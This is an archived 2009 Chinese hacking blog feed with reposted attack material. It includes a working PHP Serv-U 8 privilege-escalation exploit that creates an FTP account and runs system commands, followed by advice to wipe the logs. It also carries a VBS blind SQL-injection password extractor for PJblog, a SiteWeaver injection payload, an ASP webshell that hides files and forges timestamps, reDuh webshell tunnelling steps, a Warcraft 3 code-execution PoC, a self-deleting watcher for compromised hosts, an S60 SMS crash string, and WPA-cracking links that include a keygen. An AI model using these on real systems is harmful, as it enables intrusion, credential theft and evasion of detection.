redwolf在路上 - 网络安全

Serv-U FTP Server v8 本地提权

redwolf@redwolf.com.cn (redwolf) — Tue, 11 Aug 2009 01:19:00 +0800

发布日期：2009-08-05
更新日期：2009-08-05

受影响系统：
serv-u8

不受影响系统：
其他版本不受影响

描述：
看cnbeta发现su出8这个版本了。
想想以前写过一个7的本地提权。
不知道8有什么安全方面的更改。
下载来研究下，发现居然还是可以提权的，只是su7的那个不能直接用，稍微修改了下执行的流程。

Su8的管理平台是http的，继承了su7的方式。
抓包，分析，发现了以下路程是可以利用的。
1，管理员从管理控制台打开web页面时，是不需要验证密码的。
2，管理员如果用某URL打开web页面时，虽然需要输入密码，但是无论输入什么，都可以进入。“/?Session=39893&Language=zh,CN&LocalAdmin=1”
3，管理员可以添加用户有两种，一种是全局用户，一种是某个域下的用户。而权限设置也是两种，一种是全局，一种是针对用户。
4，管理员添加了用户的这个包和设置权限这个包，是分开的。
所以，我可以抓包然后转换成php的socket连接post出去。
最后在用经典的ftp登陆，exec命令。达到提权。

前面su7已经说了很多，这里简单的说下好了。
.....登陆什么的。
1，获取ID。
2，给这个id添加权限。
3，给这个id赋予用户名，密码，目录，权限。
4，登陆后执行系统命令。

这段代码是不能直接当工具使用的。

<*来源：kxlzx（www.inbreak.net）
*>

测试方法：

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Serv-u 8 local exp ver 1.0Serv-u 8 local exp ver 1.0管理员密码
直接提权！QA
","",$result);if ($sessionid!="")echo "登陆成功！";fclose($sock_login);//login-----------------------------------------//getOrganizationId-------------------------------$OrganizationId="";$sock_OrganizationId = fsockopen($host, $port);$URL='/Admin/ServerUsers.htm?Page=1';$postStr = createRequest($port,$host,$URL,"",$sessionid,"");fputs($sock_OrganizationId, $postStr);$resultOrganizationId="";while(!feof($sock_OrganizationId)) {$result = fread($sock_OrganizationId, 1024);$resultOrganizationId=$resultOrganizationId.$result;}$strTmp = "OrganizationUsers.xml&ID=";$OrganizationId = substr($resultOrganizationId,strpos($resultOrganizationId,$strTmp)+strlen($strTmp),strlen($strTmp)+15);$OrganizationId = substr($OrganizationId,0,strpos($OrganizationId,"\""));fclose($sock_OrganizationId);if ($OrganizationId!="")echo "获取OrganizationId".$OrganizationId."成功！";//getOrganizationId-------------------------------//getuserid---------------------------------------$getuserid="";$sock_getuserid = fsockopen($host, $port);$URL="/Admin/XML/User.xml?Command=AddObject&Object=COrganization.".$OrganizationId.".User&Temp=1&Sync=546666666666666663";$ref="http://".$host.":".$port."/Admin/ServerUsers.htm?Page=1";$post_data_getuserid="";$postStr = createRequest($port,$host,$URL,$post_data_getuserid,$sessionid,$ref);fputs($sock_getuserid, $postStr);$result = fread($sock_getuserid, 1280);$result = getmidstr("",$result);fclose($sock_getuserid);$getuserid = $result;if ($getuserid!="")echo "获取用户ID".$getuserid."成功！";//getuserid---------------------------------------//addpower-----------------------------------------$sock_addpower = fsockopen($host, $port);$URL="/Admin/XML/Result.xml?Command=AddObject&Object=CUser.".$getuserid.".DirAccess&Sync=1227081437828";$post_data_addpower['Access'] = "7999";$post_data_addpower['MaxSize'] = "0";$post_data_addpower['Dir'] = "c:\\";$post_data_addpower['undefined'] = "undefined";$postStr = createRequest($port,$host,$URL,$post_data_addpower,$sessionid,"http://127.0.0.1".":".$port."/Admin/ServerUsers.htm?Page=1");fputs($sock_addpower, $postStr,strlen($postStr));$result = fread($sock_addpower, 1280);fclose($sock_addpower);echo "添加权限成功！";//addpower-----------------------------------------//adduser-----------------------------------------$sock_adduser = fsockopen($host, $port);$URL="/Admin/XML/Result.xml?Command=UpdateObject&Object=COrganization.".$OrganizationId.".User.".$getuserid."&Sync=1227071190250";$post_data_adduser['LoginID'] = $ftpuser;$post_data_adduser['FullName'] = "";$post_data_adduser['Password'] = 'hahaha';$post_data_adduser['ComboPasswordType'] = "%E5%B8%B8%E8%A7%84%E5%AF%86%E7%A0%81";$post_data_adduser['PasswordType'] = "0";$post_data_adduser['ComboAdminType'] = "%E6%97%A0%E6%9D%83%E9%99%90";$post_data_adduser['AdminType'] = "";$post_data_adduser['ComboHomeDir'] = "/c:";$post_data_adduser['HomeDir'] = "/c:";$post_data_adduser['ComboType'] = "%E6%B0%B8%E4%B9%85%E5%B8%90%E6%88%B7";$post_data_adduser['Type'] = "0";$post_data_adduser['ExpiresOn'] = "0";$post_data_adduser['ComboWebClientStartupMode'] = "%E6%8F%90%E7%A4%BA%E7%94%A8%E6%88%B7%E4%BD%BF%E7%94%A8%E4%BD%95%E7%A7%8D%E5%AE%A2%E6%88%B7%E7%AB%AF";$post_data_adduser['WebClientStartupMode'] = "";$post_data_adduser['LockInHomeDir'] = "0";$post_data_adduser['Enabled'] = "1";$post_data_adduser['AlwaysAllowLogin'] = "1";$post_data_adduser['Description'] = "";$post_data_adduser['IncludeRespCodesInMsgFiles'] = "";$post_data_adduser['ComboSignOnMessageFilePath'] = "";$post_data_adduser['SignOnMessageFilePath'] = "";$post_data_adduser['SignOnMessage'] = "";$post_data_adduser['SignOnMessageText'] = "";$post_data_adduser['ComboLimitType'] = "%E8%BF%9E%E6%8E%A5";$post_data_adduser['LimitType'] = "Connection";$post_data_adduser['QuotaBytes'] = "0";$post_data_adduser['Quota'] = "0";$post_data_adduser['Access'] = "7999";$post_data_adduser['MaxSize'] = "0";$post_data_adduser['Dir'] = "%25HOME%25";$postStr = createRequest($port,$host,$URL,$post_data_adduser,$sessionid,"http://127.0.0.1".":".$port."/Admin/ServerUsers.htm?Page=1");fputs($sock_adduser, $postStr,strlen($postStr));$result = fread($sock_adduser, 1280);fclose($sock_adduser);echo "添加用户成功！";//adduser-----------------------------------------//exec-------------------------------$sock_exec = fsockopen("127.0.0.1", $ftpport, &$errno, &$errstr, 10);$recvbuf = fgets($sock_exec, 1024);$sendbuf = "USER ".$ftpuser."";fputs($sock_exec, $sendbuf, strlen($sendbuf));$recvbuf = fgets($sock_exec, 1024);$sendbuf = "PASS hahaha";fputs($sock_exec, $sendbuf, strlen($sendbuf));$recvbuf = fgets($sock_exec, 1024);$sendbuf = $exec_addUser."";fputs($sock_exec, $sendbuf, strlen($sendbuf));$recvbuf = fread($sock_exec, 1024);echo "执行".$exec_addUser."返回了$recvbuf";fclose($sock_exec);$sock_exec = fsockopen("127.0.0.1", $ftpport, &$errno, &$errstr, 10);$recvbuf = fgets($sock_exec, 1024);$sendbuf = "USER ".$ftpuser."";fputs($sock_exec, $sendbuf, strlen($sendbuf));$recvbuf = fgets($sock_exec, 1024);$sendbuf = "PASS hahaha";fputs($sock_exec, $sendbuf, strlen($sendbuf));$recvbuf = fgets($sock_exec, 1024);$sendbuf = $exec_addGroup."";fputs($sock_exec, $sendbuf, strlen($sendbuf));$recvbuf = fread($sock_exec, 1024);echo "执行".$exec_addGroup."返回了$recvbuf";fclose($sock_exec);echo "好了，自己3389上去清理ftp用户日志吧！";//exec-------------------------------}/** function createRequest@port_post : administrator port $port=43958;@host_post : host $host="127.0.0.1";@URL_post : target $URL='/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543';@post_data_post : arraylist $post_data['user'] = "";...@return httprequest string*/function createRequest($port_post,$host_post,$URL_post,$post_data_post,$sessionid,$referer){$data_string="";if ($post_data_post!=""){foreach($post_data_post as $key=>$value){$values[]="$key=".urlencode($value);}$data_string=implode("",$values);}$request.="POST ".$URL_post." HTTP/1.1";$request.="Host: ".$host_post."";$request.="Referer: ".$referer."";$request.="Content-type: application/x-www-form-urlencoded";$request.="Content-length: ".strlen($data_string)."";$request.="User-Agent: Serv-U";$request.="x-user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)";$request.="Accept: */*";$request.="Cache-Contro: no-cache";$request.="UA-CPU: x86";if ($sessionid!=""){$request.="Cookie: Session=".$sessionid."";}$request.="";$request.=$data_string."";return $request;}//getMidfor2str copy from internetfunction getmidstr($L,$R,$str){$int_l=strpos($str,$L);$int_r=strpos($str,$R);If ($int_l>-1&&$int_l>-1){$str_put=substr($str,$int_l+strlen($L),($int_r-$int_l-strlen($L)));return $str_put;}elsereturn "没找到需要的变量";}?>
默认为空，如果密码为空，填什么都能进去。如果修改过，管理员密码默认会在这里：C:\Program Files\RhinoSoft.com\Serv-U\Users\Local Administrator Domain\.Archive文件中找到一个MD5密码值。C:\Program Files\RhinoSoft.com\Serv-U是su的根目录。密码值的样式为(假设是123456)kx########################代表123456的32位MD5加密，而kx则是su对md5的密码算法改进的随机2位字符。破解后的密码为kx123456，去掉kx就是密码了。你可以针对这个加密生成字典。
提权的原理？Su8的管理平台是http的，继承了su7的方式。抓包，分析，发现了以下路程是可以利用的。1，  管理员从管理控制台打开web页面时，是不需要验证密码的。2，  管理员如果用某URL打开web页面时，虽然需要输入密码，但是无论输入什么，都可以进入。“/?Session=39893&Language=zh,CN&LocalAdmin=1”3，  管理员可以添加用户有两种，一种是全局用户，一种是某个域下的用户。而权限设置也是两种，一种是全局，一种是针对用户。4，  管理员添加了用户的这个包和设置权限这个包，是分开的。所以，我可以抓包然后转换成php的socket连接post出去。最后在用经典的ftp登陆，exec命令。达到提权。前面su7已经说了很多，这里简单的说下好了。.....登陆什么的。1，获取ID。2，给这个id添加权限。3，给这个id赋予用户名，密码，目录，权限。4，登陆后执行系统命令。为啥我明明显示成功了，但是却提不上去？这要看错误代码了，这里偶很惭愧，并没有写详细的错误代码判断。一般有以下几种情况：1，可能是因为管理员密码不对。参照管理员密码的连接。2，可能是因为管理员限制了执行SITE EXEC。有待程序修改，程序可以加一个让他不限制的功能。3，可能是程序问题。

建议：
目前厂商没有任何补丁，要不大家再等等？
不过以前SU7本地溢出推出来，也没见到什么动静。-_-!
先把本地管理密码改复杂点应付着吧。
Tags: Serv-U, 提权

各大游戏高危漏洞(魔兽争霸、反恐精英)

redwolf@redwolf.com.cn (redwolf) — Tue, 11 Aug 2009 01:16:00 +0800

# 鬼仔：这个洞貌似很早以前就出了，暴雪也已经出了补丁，但是
ring04h：暴雪在1.24上，做出了修复工作，但是国内的完全全部都徘徊在1.20版，谁都不会去更新。对于国内玩家，这个漏洞利用率能够稳定在90%上。

作者：ring04h

War3 Jass虚拟机经测试，存在严重漏洞！允许运行时动态创建并执行任意机器码
Jass属于War3为地图开发者提供的一套脚本语言，方便开发者开发或建立修改属于自己的地图。
经过推断，CS (cstrike)可能也存在此类问题。

利用方式：登陆浩方或者VS对战平台，修改某张地图(例如DOTA的地图)，开启游戏，等待其他玩家进入，开始游戏，即可执行任意机器码，控制玩家计算机。

Jass语言的用处
Jass(正确地说是Jass2)是魔兽3的脚本语言, 用于控制地图的进程和行为, 是魔兽游戏和地图的基础. 正常的地图编辑中摆放的单位(Unit), 设置的触发(Trigger)等最终都会被翻译成Jass语言存在地图文件里在游戏时被调用.

POC:

set bj_meleeTwinkedHeroes[1024] = 0x90909090
set bj_meleeTwinkedHeroes[1025] = 0x90909090 //and other bytecode giberish.
...

local code C = I2Code( code2I(function GetRandomDirectionDeg) + 0xC92D8 )

call TriggerAddAction(t, C)
call TriggerExecute(t)

//It will run whatever bytecode 90 90 90 90 means

function main takes nothing returns nothing
set t = CreateTrigger()
call TriggerAddAction(t, i2code(0x00929217) )
a[0]=0x45623512
a[1]=0x34562323
a[2]=0x62329301
...
//other thousand lines of this
...
b[0]=0x12312333
endfunction

上图：

文章标题加上了by ring04h,是说明ring04h将对以上的言论负责，其它稍后再编辑详情，上POC！

WPA终结梦魇----GPU运算之高速破解WPA-PSK加密实战 - [Wireless Hack]

redwolf@redwolf.com.cn (redwolf) — Sat, 18 Jul 2009 01:25:00 +0800

作者：longas

现在很多朋友都在学习和研究WPA的破解及WPA PMK Hash破解，关于WPA PMK Hash的创建及使用，我已经在《无线网络安全攻防实战》一书中给出详细操作实例，并且为了给大家提供一个练手的机会，ZerOne安全团队无线安全组也在广州安全交流会上无偿提供给大家高达4.3GB的WPA PMK Hash Table DVD光盘镜像下载（大家可到Anywlan论坛或者我的Blog查看下载地址），呵呵，虽然也受到了一些莫名其妙的指责。但是作为高速破解的途径来说，从一开始，就不止Hash这一种方法，这里我要讲述的就是在未来几年内将会成为主流的破解方法---GPU运算破解。

关于GPU运算用于无线安全领域，ZerOne安全团队无线安全组已经于2008年中展开自主研发，并已取得一些成果，本文为引导更多朋友了解此类技术所写的基础工具型破解教程，望同一方向的朋友能和我联系，欢迎大家的交流。
好了话不多说，单机环境下只要配合合适的显卡，速度可以飙升到1万以上，若是性能优异的显卡可达到5万甚至更高。关于此类工具的详细安装、操作、破解、问题解答、软件下载内容我已经全部整理成基础破解教程，提供给大家下载。

文中涉及软件：Elcomsoft Wireless Security Auditor（简称为EWSA）

软件版本：v1.0.0.133版

支持系统：Windows 2000/XP/2003/Vista/2008

软件下载：http://www.elcomsoft.com/ewsa.html

--------------------------------------------------------------

详细长达11页的GPU运算破解WPA-PSK实战操作教程，下载地址如下

http://www.box.net/shared/ygjeeim9ms

GPU相关软件EWSA及注册机下载地址如下

http://www.box.net/shared/h2n1mnhgqq

xKungFoo上的无线安全破解专用WPA-PSK Hash Table DVD下载

redwolf@redwolf.com.cn (redwolf) — Sun, 03 May 2009 14:52:00 +0800

版权声明：转载时请以超链接形式标明文章原始出处和作者信息及本声明
 http://bigpack.blogbus.com/logs/31359696.html

此次由ZerOne安全团队制作的无线安全破解专用DVD光盘，其中包含的WPA 破解 Hash Table已全部经过测试可用，所含SSID均为ZerOne安全团队在对多个省会城市进行多次实地War-Driving无线探测基础上，从汇总数据中精心挑选出国内使用频率最高的前62个SSID整理而成。光盘里除了包含多达40余种8位以上生日类密码组合外，还包括了8位以上普通用户常用密码组合，总容量达4.4GB。实为无线安全密码破解测试、无线渗透测试及安全评估之必备利器。

该DVD光盘内除了主要包含的大容量WPA-PSK/WPA2-PSK 破解用 Hash Table以外，为方便大家学习及借鉴，还附赠了由ZerOne安全团队近年来进行省会城市War-Driving的官方探测汇总报告，此外，还准备了相关无线安全教程的文档及资源列表。希望借此给大家研究无线网络安全带来实质性的帮助。

哈，作为国内第一张无线安全破解专用WPA-PSK Hash Table DVD，除实用价值外，也极具收藏和纪念意义！！

由于光盘体积过大，所以HTTP下载目前暂不可用，下为目前公开的下载方式及地址汇总：
WPA-PSK/WPA2-PSK光盘BT下载
种子一：http://bigpack.blogbus.com/files/12266612070.torrent

上述种子中的DVD光盘镜像文件已压缩，从ISO压成RAR，大约减少了900M，可为所有下载的朋友节省许多时间

种子文件物征码：60a0cca09203ed9b309c95047f3333acb1661d32 分块大小: 512 KB

种子二： http://bigpack.blogbus.com/files/12266612980.torrent

asp-webshell

redwolf@redwolf.com.cn (redwolf) — Sun, 03 May 2009 14:50:00 +0800

作者：skyfire[B.H.S.T]

隐藏并修改文件的最后修改时间的asp-webshell。

源码：

<%'隐藏并修改文件的最后修改时间的aspshell'原理:通过FSO可以修改文件的属性，比如设置为只读，隐藏，系统等等；FSO中的attributes属性修改文件属性，1只读，2隐藏，4系统文件'     通过shell.application可以给文件重新设置一个最后修改时间'2009/02/24  write by skyfireresponse.write ""response.write "路    径：(一定要以\结尾)
"response.write "文件名称：
"response.write "修改时间：
"response.write ""response.write "
"'获取提交的参数set path=request.Form("path")set fileName=request.Form("filename")set newTime=request.Form("time")if( (len(path)>0)and(len(fileName)>0)and(len(newTime)>0) )then'通过fso设置文件属性Set fso=Server.CreateObject("Scripting.FileSystemObject")Set file=fso.getFile(path&fileName)file.attributes=2+4  '设置文件属性为隐藏+系统'通过shell.Application修改文件的最后修改时间Set shell=Server.CreateObject("Shell.Application")Set app_path=shell.NameSpace(server.mappath("."))Set app_file=app_path.ParseName(fileName)app_file.Modifydate=newTimeend if%>

内网渗透利器--reDuh（webshell跳板）简单使用说明

redwolf@redwolf.com.cn (redwolf) — Sun, 03 May 2009 14:48:00 +0800

作者：sai52[B.H.S.T]

国外大牛的作品，偶顺手写了个使用说明。E文好的看原文 http://www.sensepost.com/research/reDuh/

这个工具可以把内网服务器的端口通过http/https隧道转发到本机，形成一个连通回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。

本机-------客户端---------（http隧道）-----------服务端------------------内网服务器

服务端是个webshell（针对不同服务器有aspx,php,jsp三个版本），客户端是java写的，本机执行最好装上JDK。

把客户端文件解包，这里我把它放到E盘的TEST文件夹

图01

把服务端的webshell上传到目标服务器。

图02

目标服务器在内网，开了终端服务。

图03

命令行下用客户端连接服务端

E:\test>java reDuhClient 目标服务器域名 http 80 /WEBSHELL路径/reDuh.aspx

图04

新开一个命令行，用NC连接本机1010端口。

H:\>nc -vv localhost 1010

图05

连接成功会有欢迎提示，之后输入命令

>>[createTunnel]1234:127.0.0.1:3389

前面的1234是本机连接用的端口，中间的ip地址是目标服务器的（可以是webshell所在服务器也可以是和它同内网的服务器），后面的3389是欲连接目标服务器的端口。

成功后两个命令行窗口都会有成功提示。

图06

图07

这时通道已经建立，你连接本机的1234端口就相当于连接到目标服务器的3389端口了。

图08

图09

数据的传递过程

图10

需要注意的是用此工具转发数据速度很慢，连接的时候应尽量把mstsc的颜色设置调低些。

reDuh客户端下载 reduhclient-0.3.zip
reDuh服务端下载 reduh-server-all.gz

PJblog V3.0 0day Vbs版漏洞利用工具

redwolf@redwolf.com.cn (redwolf) — Sun, 03 May 2009 14:42:00 +0800

来源：WEB安全手册

感谢雨中风铃的投递

漏洞具体细节请看http://0kee.com/read.php?tid-908.html，体代码如下：

If WScript.Arguments.Count <> 2 Then        WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名"        WScript.Echo "Example: Cscript.exe Exp.vbs http://www.pjhome.net puterjam"        WScript.QuitEnd IfattackUrl = WScript.Arguments(0)attackUser = WScript.Arguments(1)attackUrl = Replace(attackUrl,"\","/")If Right(attackUrl , 1) <> "/" Then        attackUrl = attackUrl & "/"End IfSHA1Charset = "0123456789ABCDEFJ"strHoleUrl = attackUrl & "action.asp?action=checkAlias&cname=0kee"""If IsSuccess(strHoleUrl & "or ""1""=""1") And Not IsSuccess(strHoleUrl & "and ""1""=""2") Then        WScript.Echo "恭喜！存在漏洞"Else        WScript.Echo "没有检测到漏洞"        WScript.QuitEnd IfFor n=1 To 40        For i=1 To 17                strInject = strHoleUrl & " Or 0<(Select Count(*) From blog_member Where mem_name='" & attackUser & "' And mem_password>='" & strResult & Mid(SHA1Charset, i, 1) & "') And ""1""=""1"                If Not IsSuccess(strInject) Then                        strResult = strResult & Mid(SHA1Charset, i-1, 1)                        Exit For                End If                strPrint = chr(13) & "Password(SHA1): " & strResult & Mid(SHA1Charset, i, 1)                WScript.StdOut.Write strPrint        NextNextWScript.Echo Chr(13) & Chr (10) & "Done!"Function PostData(PostUrl)	Dim Http	Set Http = CreateObject("msxml2.serverXMLHTTP")	With Http		.Open "GET",PostUrl,False		.Send ()		PostData = .ResponseBody	End With	Set Http = Nothing	PostData =bytes2BSTR(PostData)End FunctionFunction bytes2BSTR(vIn)	Dim strReturn	Dim I, ThisCharCode, NextCharCode	strReturn = ""	For I = 1 To LenB(vIn)		ThisCharCode = AscB(MidB(vIn, I, 1))		If ThisCharCode < &H80 Then			strReturn = strReturn & Chr(ThisCharCode)		Else			NextCharCode = AscB(MidB(vIn, I + 1, 1))			strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))			I = I + 1		End If	Next	bytes2BSTR = strReturnEnd FunctionFunction IsSuccess(PostUrl)strData = PostData(PostUrl)'Wscript.Echo strDataif InStr(strData,"check_error") >0 then        IsSuccess = TrueElse        IsSuccess = FalseEnd If'Wscript.Sleep 500 '让系统休息一下End Function

用法：Cscript.exe Exp.vbs 要检测的论坛网址要检测的用户名

截图如下：

一个监视终端登陆的批处理文件

redwolf@redwolf.com.cn (redwolf) — Sun, 03 May 2009 14:41:00 +0800

作者：Netpatch
来源：WEB安全手册

主要用于在登陆肉鸡终端的时候，放哨用的。一旦有人连接终端端口（默认端口3389），就发声报警，并对对方是否登陆进行监控。

如果有人登陆终端成功，就自动把指定目录的工具（exe后缀的）循环进行“结束程序进程”操作，整目录进行删除，然后注销会话并删除自身（不留任何文件）。

需要根据环境修改的参数如下：

1.终端端口（本程序为3389）

2.FC的判断结果，需要根据肉鸡语言决定（本程序针对EN 2K3版本）判断字符串为 FC对比无异同的结果取单词 differences

+++++++++++++++++++++++++++++++++++++++++++++++++++

c:\>echo a>1

c:\>echo a>2

c:\>fc /b 1 2
Comparing files 1 and 2
FC: no differences encountered

+++++++++++++++++++++++++++++++++++++++++++++++++++++

%temp%\down 此目录是用来放要运行的工具的，EXE后缀的程序，当终端有别人登录时会被程序自动结束进程（所有EXE后缀的文件循环一遍）

下载地址：login.rar

S60手机漏洞

redwolf@redwolf.com.cn (redwolf) — Sun, 03 May 2009 14:38:00 +0800

公告 https://berlin.ccc.de/~tobias/cos/s60-curse-of-silence-advisory.txt
http://www.sebug.net/exploit/5509/
演示视频 https://berlin.ccc.de/~tobias/cos/s60-curse-of-silence-demo.avi

攻击方法:
E50 上测试成功 S60 v3.0系统，我的e61i，e71也挂了。呼呼
只用发送一次email格式的SMS,"123456789@123456789.1234567890123 "(末尾有空格)到被攻击手机
注意: 发送的恶意短信,接收方是没有提示的
攻击成功后, 被攻击手机将无法收到后续短信.

S60 v3.1稍微好点的地方是需要发送11次,而且被攻击手机接收新的正常短信时,至少有个"内存不足"的提示
nokia没更新固件前,
为了验证自己没被黑,每天发一条短信给10086,看是能否收到回复.

鉴于该漏洞的严重危害性，提醒所有使用上述机型的机友：
1.S60 3.1系统的手机，进入短信息收件箱时，出现“内存不足，请删除一些短信”等提示时，很可能已经中招。
2.其他上述提及但非3.1系统的手机，长时间收不到短信息。

解决办法：
下载并安装专杀工具（已签名）：
forticleanup_cursesms_v_1_0_3_signed.rar

MD5: 6DA7A9BAC28DCB290F8893D9B3A16BF3
SHA1: 61B7D2C5CA9E86A4BEC35523363883CCCA9AA713

如果感觉有异常,就看看http://www.fortiguardcenter.com/mobile/cleanup.html 吧，还是不行的话就直接*#7370#

解决方案 - 被动防御，等待官方更新
目前诺基亚官方尚未发布修补改补丁的新版本固件，如果您的手机目前还正常，请务必开启短信防火墙，拒绝陌生人短信，同时，为了避免来自通讯录中联系人的攻击，ZDNet安全频道强烈建议你安装诺基亚和F-Secure推出的保护程序，直到诺基亚推出新固件为止。
对于已经受到威胁的手机用户，可以在这里下载漏洞修复补丁。
安装完补丁程序之后请重启手机，然后打开该专杀补丁进行扫描，手机即可恢复正常
诺基亚S60短信漏洞修复补丁（非官方）

Download ( 306 downloads)

Click to download: FortiCleanup[1].CurseSMS.v1.0.3.S60.SymbianOS9.ZH.CnPDA.rar

动易SiteWeaver6.6版最新漏洞利用工具

redwolf@redwolf.com.cn (redwolf) — Sun, 03 May 2009 14:00:00 +0800

作者：Cschii

动易SiteWeaver6.6版最新漏洞利用工具
请输入URL：
输入Post：
<?xml version=“1.0″ encoding=“gb2312″?> </li> <li><root><id>21</id><page>1</page><value>0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,DownloadUrl,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from PE_soft where softid=1|1</value></root>
注入结果：

转载自黑客防线